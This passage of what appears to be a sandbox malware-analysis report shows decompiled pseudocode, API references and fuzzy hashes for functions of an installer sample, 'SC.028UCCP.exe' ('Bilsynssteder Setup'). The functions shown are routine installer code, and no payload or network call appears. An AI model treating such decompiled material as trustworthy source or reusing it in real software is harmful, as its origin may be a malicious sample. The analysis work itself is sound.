				_t13 =  *((intOrPtr*)(_t30 - 0x14));
				 *0x40afdf = 1;
				 *0x40afdc = _t13 & 0x00000001;
				 *0x40afdd = _t13 & 0x00000002;
				 *0x40afde = _t13 & 0x00000004;
				E00405BBA(_t20, _t26, _t28, "Times New Roman",  *((intOrPtr*)(_t30 - 0x20)));
				_t16 = CreateFontIndirectA(0x40afc8);
				_push(_t16);
				_push(_t28);
				E00405AF6();
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                  0x00401d2f
                                  0x00401d36
                                  0x00401d51
                                  0x00401d56
                                  0x00401d63
                                  0x00401d68
                                  0x00401d73
                                  0x00401d7a
                                  0x00401d8c
                                  0x00401d92
                                  0x00401d97
                                  0x00401da1
                                  0x004024c9
                                  0x00401561
                                  0x00402844
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • GetDC.USER32(?), ref: 00401D29
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                  • ReleaseDC.USER32 ref: 00401D56
                                  • CreateFontIndirectA.GDI32(0040AFC8), ref: 00401DA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                  • String ID: Times New Roman
                                  • API String ID: 3808545654-927190056
                                  • Opcode ID: aa9dc3adce9858671d5dba2cadb35a05a48f9df2347b8c60a3318e7a06823940
                                  • Instruction ID: c142ac7f18e80a92cd8e2978e7193c4b91d53847f6be053cad09bf3429225ebb
                                  • Opcode Fuzzy Hash: aa9dc3adce9858671d5dba2cadb35a05a48f9df2347b8c60a3318e7a06823940
                                  • Instruction Fuzzy Hash: 5A01FEB1945341BFEB0157B09F0AB9E3F75A715301F100435F102BA1E2C5791411DB2F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1000182A Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E1000182A(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v148;
				void _t46;
				void _t47;
				signed int _t48;
				signed int _t49;
				signed int _t58;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t78;
				void* _t82;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				void* _t102;

				_t86 = __edx;
				 *0x1000405c = _a8;
				_t78 = 0;
				 *0x10004060 = _a16;
				_v8 = 0;
				_a16 = E1000123B();
				_a8 = E1000123B();
				_t91 = E1000131B(_a16);
				_t82 = _a8;
				_t88 = _t86;
				_t46 =  *_t82;
				if(_t46 != 0x7e && _t46 != 0x21) {
					_v16 = E1000123B();
					_t78 = E1000131B(_t75);
					_v8 = _t86;
					GlobalFree(_v16);
					_t82 = _a8;
				}
				_t47 =  *_t82;
				_t102 = _t47 - 0x2f;
				if(_t102 > 0) {
					_t48 = _t47 - 0x3c;
					__eflags = _t48;
					if(_t48 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3c;
						if( *((char*)(_t82 + 1)) != 0x3c) {
							__eflags = _t88 - _v8;
							if(__eflags > 0) {
								L54:
								_t49 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t91 = _t49;
								_t88 = _t86;
								L57:
								E10001446(_t86, _t91, _t88,  &_v148);
								E10001278( &_v148);
								GlobalFree(_a16);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t49 = 1;
								goto L55;
							}
							__eflags = _t91 - _t78;
							if(_t91 < _t78) {
								goto L47;
							}
							goto L54;
						}
						_t86 = _t88;
						_t49 = E10002C90(_t91, _t78, _t86);
						goto L56;
					}
					_t58 = _t48 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags = _t91 - _t78;
						if(_t91 != _t78) {
							goto L54;
						}
						__eflags = _t88 - _v8;
						if(_t88 != _v8) {
							goto L54;
						}
						goto L47;
					}
					_t59 = _t58 - 1;
					__eflags = _t59;
					if(_t59 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3e;
						if( *((char*)(_t82 + 1)) != 0x3e) {
							__eflags = _t88 - _v8;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t91 - _t78;
							if(_t91 <= _t78) {
								goto L54;
							}
							goto L47;
						}
						_t86 = _t88;
						_t49 = E10002CB0(_t91, _t78, _t86);
						goto L56;
					}
					_t61 = _t59 - 0x20;
					__eflags = _t61;
					if(_t61 == 0) {
						_t91 = _t91 ^ _t78;
						_t88 = _t88 ^ _v8;
						goto L57;
					}
					_t62 = _t61 - 0x1e;
					__eflags = _t62;
					if(_t62 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x7c;
						if( *((char*)(_t82 + 1)) != 0x7c) {
							_t91 = _t91 | _t78;
							_t88 = _t88 | _v8;
							goto L57;
						}
						__eflags = _t91 | _t88;
						if((_t91 | _t88) != 0) {
							goto L47;
						}
						__eflags = _t78 | _v8;
						if((_t78 | _v8) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t62 == 0;
					if(_t62 == 0) {
						_t91 =  !_t91;
						_t88 =  !_t88;
					}
					goto L57;
				}
				if(_t102 == 0) {
					L21:
					__eflags = _t78 | _v8;
					if((_t78 | _v8) != 0) {
						_v20 = E10002B20(_t91, _t88, _t78, _v8);
						_v16 = _t86;
						_t49 = E10002BD0(_t91, _t88, _t78, _v8);
						_t82 = _a8;
					} else {
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_t49 = _t91;
						_t86 = _t88;
					}
					__eflags =  *_t82 - 0x2f;
					if( *_t82 != 0x2f) {
						goto L56;
					} else {
						_t91 = _v20;
						_t88 = _v16;
						goto L57;
					}
				}
				_t68 = _t47 - 0x21;
				if(_t68 == 0) {
					_t49 = 0;
					__eflags = _t91 | _t88;
					if((_t91 | _t88) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t69 = _t68 - 4;
				if(_t69 == 0) {
					goto L21;
				}
				_t70 = _t69 - 1;
				if(_t70 == 0) {
					__eflags =  *((char*)(_t82 + 1)) - 0x26;
					if( *((char*)(_t82 + 1)) != 0x26) {
						_t91 = _t91 & _t78;
						_t88 = _t88 & _v8;
						goto L57;
					}
					__eflags = _t91 | _t88;
					if((_t91 | _t88) == 0) {
						goto L54;
					}
					__eflags = _t78 | _v8;
					if((_t78 | _v8) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t71 = _t70 - 4;
				if(_t71 == 0) {
					_t49 = E10002AE0(_t91, _t88, _t78, _v8);
					goto L56;
				} else {
					_t72 = _t71 - 1;
					if(_t72 == 0) {
						_t91 = _t91 + _t78;
						asm("adc edi, [ebp-0x4]");
					} else {
						if(_t72 == 0) {
							_t91 = _t91 - _t78;
							asm("sbb edi, [ebp-0x4]");
						}
					}
					goto L57;
				}
			}


























                                  0x1000182a
                                  0x10001837
                                  0x10001840
                                  0x10001843
                                  0x10001848
                                  0x10001850
                                  0x1000185b
                                  0x10001864
                                  0x10001866
                                  0x10001869
                                  0x1000186b
                                  0x1000186f
                                  0x1000187b
                                  0x10001884
                                  0x10001889
                                  0x1000188c
                                  0x10001892
                                  0x10001892
                                  0x10001895
                                  0x10001898
                                  0x1000189b
                                  0x10001961
                                  0x10001961
                                  0x10001964
                                  0x100019cd
                                  0x100019d1
                                  0x100019e0
                                  0x100019e3
                                  0x100019eb
                                  0x100019eb
                                  0x100019eb
                                  0x100019ed
                                  0x100019ed
                                  0x100019ee
                                  0x100019ee
                                  0x100019f0
                                  0x100019f2
                                  0x100019fb
                                  0x10001a07
                                  0x10001a18
                                  0x10001a23
                                  0x10001a23
                                  0x100019e5
                                  0x100019c8
                                  0x100019c8
                                  0x100019ca
                                  0x100019ca
                                  0x00000000
                                  0x100019ca
                                  0x100019e7
                                  0x100019e9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x100019e9
                                  0x100019d5
                                  0x100019d9
                                  0x00000000
                                  0x100019d9
                                  0x10001966
                                  0x10001966
                                  0x10001967
                                  0x100019bf
                                  0x100019c1
                                  0x00000000
                                  0x00000000
                                  0x100019c3
                                  0x100019c6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x100019c6
                                  0x10001969
                                  0x10001969
                                  0x1000196a
                                  0x1000199f
                                  0x100019a3
                                  0x100019b2
                                  0x100019b5
                                  0x00000000
                                  0x00000000
                                  0x100019b7
                                  0x00000000
                                  0x00000000
                                  0x100019b9
                                  0x100019bb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x100019bd
                                  0x100019a7
                                  0x100019ab
                                  0x00000000
                                  0x100019ab
                                  0x1000196c
                                  0x1000196c
                                  0x1000196f
                                  0x10001998
                                  0x1000199a
                                  0x00000000
                                  0x1000199a
                                  0x10001971
                                  0x10001971
                                  0x10001974
                                  0x10001980
                                  0x10001984
                                  0x10001991
                                  0x10001993
                                  0x00000000
                                  0x10001993
                                  0x10001986
                                  0x10001988
                                  0x00000000
                                  0x00000000
                                  0x1000198a
                                  0x1000198d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1000198f
                                  0x10001977
                                  0x10001978
                                  0x1000197a
                                  0x1000197c
                                  0x1000197c
                                  0x00000000
                                  0x10001978
                                  0x100018a1
                                  0x10001919
                                  0x1000191b
                                  0x1000191e
                                  0x1000193c
                                  0x1000193f
                                  0x10001945
                                  0x1000194a
                                  0x10001920
                                  0x10001920
                                  0x10001924
                                  0x10001928
                                  0x1000192a
                                  0x1000192a
                                  0x1000194d
                                  0x10001950
                                  0x00000000
                                  0x10001956
                                  0x10001956
                                  0x10001959
                                  0x00000000
                                  0x10001959
                                  0x10001950
                                  0x100018a3
                                  0x100018a6
                                  0x1000190a
                                  0x1000190c
                                  0x1000190e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001914
                                  0x100018a8
                                  0x100018ab
                                  0x00000000
                                  0x00000000
                                  0x100018ad
                                  0x100018ae
                                  0x100018e4
                                  0x100018e8
                                  0x10001900
                                  0x10001902
                                  0x00000000
                                  0x10001902
                                  0x100018ea
                                  0x100018ec
                                  0x00000000
                                  0x00000000
                                  0x100018f2
                                  0x100018f5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x100018fb
                                  0x100018b0
                                  0x100018b3
                                  0x100018da
                                  0x00000000
                                  0x100018b5
                                  0x100018b5
                                  0x100018b6
                                  0x100018ca
                                  0x100018cc
                                  0x100018b8
                                  0x100018ba
                                  0x100018c0
                                  0x100018c2
                                  0x100018c2
                                  0x100018ba
                                  0x00000000
                                  0x100018b6

                                  APIs
                                    • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                    • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                  • GlobalFree.KERNEL32 ref: 1000188C
                                  • GlobalFree.KERNEL32 ref: 10001A18
                                  • GlobalFree.KERNEL32 ref: 10001A1D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: FreeGlobal$lstrcpy
                                  • String ID:
                                  • API String ID: 176019282-0
                                  • Opcode ID: 4614ed1b287cbce5bbde6973ecf19ce2fdc55db5ca3753ae9986d2bfd743fe8c
                                  • Instruction ID: b3b2127d6fa55a06a2500fd1685b4752a9dc59771af94d5312cfae8ee0bfb045
                                  • Opcode Fuzzy Hash: 4614ed1b287cbce5bbde6973ecf19ce2fdc55db5ca3753ae9986d2bfd743fe8c
                                  • Instruction Fuzzy Hash: E051D332D04159AAFB21DFA4C8A16EEBBF5EB453D0F22416AE805E311DC635AF01DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401CCC(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A07(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                  0x00401cd6
                                  0x00401cdd
                                  0x00401d0c
                                  0x00401d14
                                  0x00401d1b
                                  0x00401d1b
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: d56188219697d5a9022e48a5b127ed1ab16f4984756dd3b6fdcb6bca33d64de9
                                  • Instruction ID: f7f1d63128c079cdfc256ea0cddfbe125cd0bfb1103d38193b94d487dccf8fd6
                                  • Opcode Fuzzy Hash: d56188219697d5a9022e48a5b127ed1ab16f4984756dd3b6fdcb6bca33d64de9
                                  • Instruction Fuzzy Hash: 89F0FFB2A05114AFE701EBA4EE89DAFB7BCEB44301B104576F501F2191C674AD018B79
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040468E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E0040468E(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405BBA(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405BBA(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405BBA(_t34, 0, 0x42a020, 0x42a020, _a8);
				wsprintfA(_t26 + lstrlenA(0x42a020), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e378, _a4, 0x42a020);
			}













                                  0x00404696
                                  0x0040469a
                                  0x004046a2
                                  0x004046a5
                                  0x004046a6
                                  0x004046a8
                                  0x004046aa
                                  0x004046ad
                                  0x004046ad
                                  0x004046b4
                                  0x004046ba
                                  0x004046ba
                                  0x004046c1
                                  0x004046cc
                                  0x004046cd
                                  0x004046d0
                                  0x004046d0
                                  0x004046dd
                                  0x004046e8
                                  0x004046eb
                                  0x004046fd
                                  0x00404704
                                  0x00404705
                                  0x00404714
                                  0x00404724
                                  0x00404740

                                  APIs
                                  • lstrlenA.KERNEL32(0042A020,0042A020,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045AE,000000DF,0000040F,00000400,00000000), ref: 0040471C
                                  • wsprintfA.USER32 ref: 00404724
                                  • SetDlgItemTextA.USER32 ref: 00404737
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: c8ea056dfa3a144537beba2f3c6443934102d1c9b75279f744f3cebc6392e070
                                  • Instruction ID: 203f11412081ff20a0a771540c2b0fd723cd680d979dc2a143f6ad93c85b8d83
                                  • Opcode Fuzzy Hash: c8ea056dfa3a144537beba2f3c6443934102d1c9b75279f744f3cebc6392e070
                                  • Instruction Fuzzy Hash: C0113B33A0013437DB0065699C05EAF325ADBC2335F140237FA25F61D1E9799C1185E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E00401BB8() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029EA(3);
				 *(_t55 + 8) = E004029EA(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E00402A07(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A07(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A07();
					_t28 = E00402A07();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EA();
					_t37 = E004029EA();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AF6();
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                  0x00401bc1
                                  0x00401bcd
                                  0x00401bd0
                                  0x00401bd9
                                  0x00401bd9
                                  0x00401bdc
                                  0x00401be0
                                  0x00401be9
                                  0x00401be9
                                  0x00401bec
                                  0x00401bf0
                                  0x00401bf2
                                  0x00401c3f
                                  0x00401c41
                                  0x00401c4a
                                  0x00401c52
                                  0x00401c55
                                  0x00401c55
                                  0x00401c5e
                                  0x00000000
                                  0x00401bf4
                                  0x00401bfb
                                  0x00401bfd
                                  0x00401c05
                                  0x00401c08
                                  0x00401c30
                                  0x00401c64
                                  0x00401c64
                                  0x00401c0a
                                  0x00401c18
                                  0x00401c20
                                  0x00401c23
                                  0x00401c23
                                  0x00401c08
                                  0x00401c67
                                  0x00401c6a
                                  0x00401c70
                                  0x00402844
                                  0x00402844
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                  • SendMessageA.USER32 ref: 00401C30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 3b608c58aeb320f54738e69ae64955449a08ff71577337817719eb1ffb212fcd
                                  • Instruction ID: f21ca504329920278120de39c351f2906d9b7b9b661f4dd592fc9a47aef1d7f1
                                  • Opcode Fuzzy Hash: 3b608c58aeb320f54738e69ae64955449a08ff71577337817719eb1ffb212fcd
                                  • Instruction Fuzzy Hash: B5219071A44248AFEF01AFB4CD8AAAE7FB5EF44348F14043EF501B61E1D6B99940DB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403908 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403908(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ebe4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ebb0; // 0x5aa248
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ebe0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e380 = _t18[1];
					 *0x42ec48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e37c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a000, E00405BBA(_t13, _t24, _t26, "Bilsynssteder Setup", 0xfffffffe));
						_t11 =  *0x42ebcc; // 0x1
						_t27 =  *0x42ebc8; // 0x5aa474
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x5aa48c
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                  0x0040390c
                                  0x00403911
                                  0x00403917
                                  0x0040391c
                                  0x0040391c
                                  0x00403924
                                  0x00000000
                                  0x00000000
                                  0x00403926
                                  0x0040392c
                                  0x00403934
                                  0x00403936
                                  0x0040393c
                                  0x0040393c
                                  0x0040393e
                                  0x0040394a
                                  0x00000000
                                  0x00000000
                                  0x0040394e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403950
                                  0x00403955
                                  0x0040395e
                                  0x00403964
                                  0x00403969
                                  0x0040397d
                                  0x00403988
                                  0x004039a0
                                  0x004039a6
                                  0x004039ab
                                  0x004039b3
                                  0x004039d4
                                  0x004039d4
                                  0x004039d4
                                  0x004039b5
                                  0x004039b7
                                  0x004039b7
                                  0x004039bb
                                  0x004039be
                                  0x004039c2
                                  0x004039c2
                                  0x004039c7
                                  0x004039cd
                                  0x004039cd
                                  0x00000000
                                  0x004039b7
                                  0x0040396b
                                  0x00403970
                                  0x00403979
                                  0x00403972
                                  0x00403972
                                  0x00403972
                                  0x00403970

                                  APIs
                                  • SetWindowTextA.USER32(00000000,Bilsynssteder Setup), ref: 004039A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: TextWindow
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$1033$Bilsynssteder Setup
                                  • API String ID: 530164218-2271253969
                                  • Opcode ID: e691829e5d8f6da335696d0e2a33a8aa908241772f9c4842c13feab9fa2f0a75
                                  • Instruction ID: 61f94bd1e48dda17ae9277a932331f79ad4cfb9e5e678fa4023af28e916b2a63
                                  • Opcode Fuzzy Hash: e691829e5d8f6da335696d0e2a33a8aa908241772f9c4842c13feab9fa2f0a75
                                  • Instruction Fuzzy Hash: 5911F3B1B046009BC734DF56DC80A733B6DEB85716768417BEC02A73E0C779AD028A58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405645 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405645(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409014);
				}
				return _t7;
			}




                                  0x00405646
                                  0x0040565d
                                  0x00405665
                                  0x00405665
                                  0x0040566d

                                  APIs
